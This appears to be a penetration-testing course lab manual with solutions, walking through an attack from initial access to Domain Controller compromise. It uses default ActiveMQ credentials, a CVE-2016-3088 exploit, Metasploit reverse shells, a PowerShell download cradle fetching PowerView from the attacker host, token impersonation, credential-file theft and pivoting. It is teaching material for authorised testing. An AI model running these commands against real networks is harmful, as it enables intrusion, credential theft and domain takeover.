© 2018 Caendra Inc.

| Hera for PTPv5 | PowerShell for Post-exploitation and 1

Lateral Movement
For your second engagement, you have been tasked to conduct another external penetration
test against an organization whose publicly-facing IP address range is 172.17.80.0/24

Your tester IP address is within the 175.13.80.0/24 range.

Task: Perform remote exploitation and post-exploitation tasks on vulnerable external

systems, gain access to the internal net block leveraging powershell and related tools for as
many tasks as possible, and ultimately, obtain Domain Administrator status within the ELS-
CHILD domain by pivoting through the environment.

Network Diagram:

© 2018 Caendra Inc. | Hera for PTPv5 | PowerShell for Post-exploitation and 2
Lateral Movement
 • Identify vulnerabilities from a remote exploitation perspective.
• Exploit discovered vulnerabilities.
• Obtain access to machines on other internal subnets.
• Use PowerShell and related tools for tasks where applicable.
• Obtain Domain Administrator privileges by pivoting through the internal network.

• PowerShell
• Nmap
• Metasploit

One or more of the systems on the external IP range contains a vulnerability or

misconfiguration. Identify the vulnerability or misconfiguration and obtain access to the
vulnerable target and obtain a meterpreter shell back to your attacker system.

© 2018 Caendra Inc. | Hera for PTPv5 | PowerShell for Post-exploitation and 3
Lateral Movement
Using your access on the vulnerable publicly-facing target, use that machine as a pivot to
enumerate the internal network and conduct local enumeration the compromised target,
and additionally, identify domain a domain controller.

Using information obtained via recon of the initially compromised system, use Metasploit
and powershell-related tools to execute commands on a Domain Controller, ultimately
resulting in a meterpreter Session to the Domain Controller as an administrative user.

© 2018 Caendra Inc. | Hera for PTPv5 | PowerShell for Post-exploitation and 4
Lateral Movement
Below, you can find solutions for each task for the exploitation tasks related to this lab.
Remember though that you can follow your own strategy (which may be different from the
one explained in the following lab).

© 2018 Caendra Inc. | Hera for PTPv5 | PowerShell for Post-exploitation and 5
Lateral Movement
The first step with any external or internal penetration involves identifying live hosts
within a provided target IP range. We first execute a nmap ping scan against the provided
external CIDR block.

# nmap -sn 172.17.80.0/24

We identify two live systems; our focus will be on the 172.17.80.100 machine.

We run a port scan for all TCP ports against that host:

# nmap -sS -p- 172.17.80.100 --open -n

We identify an interesting open port at TCP 8161, and after conducting a version scan, we
see that it’s http, and furthermore, we browse to the IP and port to confirm that an
installation of Apache’s ActiveMQ is configured.

© 2018 Caendra Inc. | Hera for PTPv5 | PowerShell for Post-exploitation and 6
Lateral Movement
# nmap -sS 172.17.80.100 -sV --version-all -p 8161

Clicking on the “Manage ActiveMQ Broker” link, in the screenshot above, we are prompted
with a Basic Authorization login prompt. After conducting some cursory research on this
particular application, we find that some versions ship with default credentials of
“admin/admin.” We attempt those credentials and are logged into the application, where we
can further identify its exact version of 5.11.1.

© 2018 Caendra Inc. | Hera for PTPv5 | PowerShell for Post-exploitation and 7
Lateral Movement
Upon additional research of this specific version, we find that it is affected by a vulnerability
that allows authenticated attackers to upload and execute arbitrary files via a sequence of
PUT and MOVE HTTP commands, which we can read more about in this CVE: CVE-2016-
3088 (https://www.cvedetails.com/cve/CVE-2016-3088/)

The CVE entry for this vulnerability also tells us there’s a Metasploit module. However, we
find that the module, in certain implementations, doesn’t work correctly or is unstable, and
we find another suitable exploit script by searching github for the CVE in question. We come
across the following script, which we will use for exploiting this service:

https://github.com/coffeehb/Some-PoC-oR-ExP/blob/master/ActiveMQExP/ActiveMQExPV1.0.py

Looking at the python code of the exploit, or simply running it, shows us we’ll also need the
“cmd.jsp” file which can also be found in the above github repository.

© 2018 Caendra Inc. | Hera for PTPv5 | PowerShell for Post-exploitation and 8
Lateral Movement
Once we’ve downloaded both the script and cmd.jsp file, we can use the following command
to exploit the ActiveMQ service:

# python ActiveMQExPV1.0.py -url http://172.17.80.100:8161/ -user admin -pass

admin -shell cmd.jsp

© 2018 Caendra Inc. | Hera for PTPv5 | PowerShell for Post-exploitation and 9
Lateral Movement
The exploit, when successful, provides us with a URL we can browse to (as seen above),
which will be JSP-based command shell:

Obtaining a powershell-based meterpreter session from this command shell is rather

straight-forward at this point. In the last lab, we used Metasploit web_delivery module to
generate a powershell one-liner of which we only used the URL portion. This time, we’ll use
the entire Powershell one-liner, and use the new ActiveMQ command shell to execute our
powershell payload.

First, we configure our web_delivery module to generate a powershell one-liner:

msf > use exploit/multi/script/web_delivery

msf exploit(multi/script/web_delivery) > set target 2
msf exploit(multi/script/web_delivery) > set payload
windows/x64/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set LHOST 175.13.80.16
msf exploit(multi/script/web_delivery) > set LPORT 4444
msf exploit(multi/script/web_delivery) > set SRVHOST 175.13.80.16
msf exploit(multi/script/web_delivery) > set ExitOnSession False
msf exploit(multi/script/web_delivery) > exploit -j

© 2018 Caendra Inc. | Hera for PTPv5 | PowerShell for Post-exploitation and 10
Lateral Movement
Next, we’ll copy the entire powershell command as seen in the above web_delivery module
output, and run that in the ActiveMQ command shell we obtained:

Upon clicking the “Send” button, we should get a meterpreter shell back to our listener:

And also, we confirm that it is a SYSTEM shell:

msf exploit(multi/script/web_delivery) > sessions -l

© 2018 Caendra Inc. | Hera for PTPv5 | PowerShell for Post-exploitation and 11
Lateral Movement
Now that we have access to the first compromised machine, we can configure it as a pivot by
first running the “autoroute” module on the meterpreter session as we’ve done previously,
but we can also do this from within meterpreter:

msf exploit(multi/script/web_delivery) > sessions -i 1

[*] Starting interaction with 1...
meterpreter > run autoroute -s 10.100.11.0/24

Since we’re SYSTEM, at this point, we may be able to use some built-in meterpreter
commands to further our objectives in ultimately getting access to a Domain Controller. First,

© 2018 Caendra Inc. | Hera for PTPv5 | PowerShell for Post-exploitation and 12
Lateral Movement
we load the “incognito” extension, and list any available tokens we may be able to use for
impersonation:

meterpreter > use incognito

Loading extension incognito...Success.
meterpreter > list_tokens -u

We can see in the above list_tokens -u output, that we have several Delegation Tokens
available for us to use, but we’re interested in the ELS-CHILD\local_admin token since that
will allow us to conduct enumeration against the Domain Controller.

Let’s impersonate that token:

meterpreter > impersonate_token ELS-CHILD\\local_admin

Now that we’re impersonating the local_admin for the ELS-CHILD domain, we can conduct
some cursory enumeration using some PowerShell modules from the PowerSploit
framework. Specifically, let’s make sure we have the PowerView.ps1 script from the
PowerSploit framework downloaded onto our target machine. We’ll then want to as we did
in the previous powershell lab, serve that ps1 script using a python SimpleHTTPServer.

© 2018 Caendra Inc. | Hera for PTPv5 | PowerShell for Post-exploitation and 13
Lateral Movement
# python -m SimpleHTTPServer 8000

Once we’ve set up, our simple HTTP server can run some powershell download cradles from
the meterpreter shell. First, we drop into a shell with the “shell” command:

meterpreter > shell

Next, we can run the following two commands on the meterpreter shell. The first, should
identify a Domain Controller, and the second, should determine whether the “local_admin”
user can access the Domain Controller:

C:\apache-activemq-5.11.1\bin\win64> powershell "IEX (New-Object

Net.WebClient).DownloadString('http://175.13.80.16:8000/PowerView.ps1'); Get-
NetDomainController"

© 2018 Caendra Inc. | Hera for PTPv5 | PowerShell for Post-exploitation and 14
Lateral Movement
C:\apache-activemq-5.11.1\bin\win64> powershell "IEX (New-Object
Net.WebClient).DownloadString('http://175.13.80.16:8000/PowerView.ps1');
Find-LocalAdminAccess"

We now know that our current user “ELS-CHILD\local_admin” is a local administrator of the
Domain Controller. Good News!

Our next step is to set up a portproxy so we can pivot from our host to another machine
which has direct access to the domain controller. First, since configuring a portproxy
requires SYSTEM, and we’re currently “ELS-CHILD\local_admin” due to the token
impersonation commands, we should first send our shell into the background with the
“CTRL-Z” command, and then the “rev2self” command which should get us back to SYSTEM:

© 2018 Caendra Inc. | Hera for PTPv5 | PowerShell for Post-exploitation and 15
Lateral Movement
C:\apache-activemq-5.11.1\bin\win64> ^Z
Background channel 1? [y/N] y
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Now that we’re back to SYSTEM let’s conduct some enumeration before we configure our
portproxy. We can use the “search” command from inside meterpreter, to find any text files,
which we’ve seen in the past, and is a good step in looking for sensitive information on a
compromised host:

meterpreter > search -f *.txt

One of the first files we discover as a result of the search command is a “uat_test_account.txt”
file. This sounds ripe for the picking. Let’s download it.

meterpreter > download c:\\UAT\\uat_test_account.txt /tmp/

We have now found credentials in a text file on a compromised machine, quite a frequent
occurrence in the real-world actually. Always search for files that might contain credentials.

© 2018 Caendra Inc. | Hera for PTPv5 | PowerShell for Post-exploitation and 16
Lateral Movement
Before we move forward, we need to find a system that has direct access to the domain
controller, for instance, a system which is connected to the 10.100.10.0/24 subnet which we
found was the subnet of the Domain Controller from previous recon. We need to first identify
one of those systems.

Let’s first background our meterpreter session, and use a “post” module to scan the
10.100.11.0/24 subnet to find a system which we may be able to use as a pivot to execute
commands on the domain controller. We’ll use the “arp_scanner ” post module to conduct an
arp scan from the Windows 7 machine session we currently have access to, to discover
another host which may have access to the domain controller subnet:

Meterpreter> background
msf> use post/windows/gather/arp_scanner
msf post(windows/gather/arp_scanner) > set RHOSTS 10.100.11.0/24
msf post(windows/gather/arp_scanner) > set SESSION 1
msf post(windows/gather/arp_scanner) > run

Again, we have identified another system on the 10.100.11.0/24 network. Assuming that
system is a domain-joined system, we can try our “ELS-CHILD\local_admin” credentials in
conjunction with metasploits “powershell_remoting” module against it.

Let’s first setup our portproxy as we were planning to earlier so we can bounce off the
Windows 7 machine, to the newly found 10.100.11.100 system.

msf post(windows/gather/arp_scanner) > use post/windows/manage/portproxy

msf post(windows/manage/portproxy) > set CONNECT_ADDRESS 175.13.80.16
msf post(windows/manage/portproxy) > set CONNECT_PORT 4444
msf post(windows/manage/portproxy) > set LOCAL_ADDRESS 10.100.11.101

© 2018 Caendra Inc. | Hera for PTPv5 | PowerShell for Post-exploitation and 17
Lateral Movement
msf post(windows/manage/portproxy) > set LOCAL_PORT 4444
msf post(windows/manage/portproxy) > set SESSION 1
msf post(windows/manage/portproxy) > run

Now that our portproxy is configured, we can use the ELS-CHILD\local_admin” credentials
to execute a powershell_remoting exploit against the newly identified system.

msf exploit(multi/script/web_delivery) > use

exploit/windows/local/powershell_remoting
msf exploit(windows/local/powershell_remoting) > set SESSION 1
msf exploit(windows/local/powershell_remoting) > set SMBUSER local_admin
msf exploit(windows/local/powershell_remoting) > set SMBPASS P@ssw0rd123
msf exploit(windows/local/powershell_remoting) > set SMBDOMAIN ELS-CHILD
msf exploit(windows/local/powershell_remoting) > set RHOSTS 10.100.11.100
msf exploit(windows/local/powershell_remoting) > set payload
windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/powershell_remoting) > set LHOST 10.100.11.101
msf exploit(windows/local/powershell_remoting) > set LPORT 4444
msf exploit(windows/local/powershell_remoting) > exploit -j

At this point, we should now have a meterpreter session back from the win 10 machine,
which is directly connected to the same network that the domain controller is on.

© 2018 Caendra Inc. | Hera for PTPv5 | PowerShell for Post-exploitation and 18
Lateral Movement
We now have two active sessions, one from the Windows 7 pivot machine as SYSTEM, and
another as the ELS-CHILD\local_admin user on the Windows 10 machine.

Now that we have a meterpreter session on a system on the same net as the DC, we can use
the same powershell_remoting technique to execute commands on the Domain Controller as
the “ELS-CHILD\local_admin” user.

Let’s modify our powershell_remoting exploit to use our new SESSION on the Windows 10
machine, and also set our RHOST to the IP address of the domain controller so we can launch
a powershell payload on the DC via powershell remoting:

msf exploit(windows/local/powershell_remoting) > set SESSION 2

msf exploit(windows/local/powershell_remoting) > set RHOSTS 10.100.10.253
msf exploit(windows/local/powershell_remoting) > exploit -j

And we should now have a meterpreter session on the Domain Controller:

© 2018 Caendra Inc. | Hera for PTPv5 | PowerShell for Post-exploitation and 19
Lateral Movement
© 2018 Caendra Inc. | Hera for PTPv5 | PowerShell for Post-exploitation and 20
Lateral Movement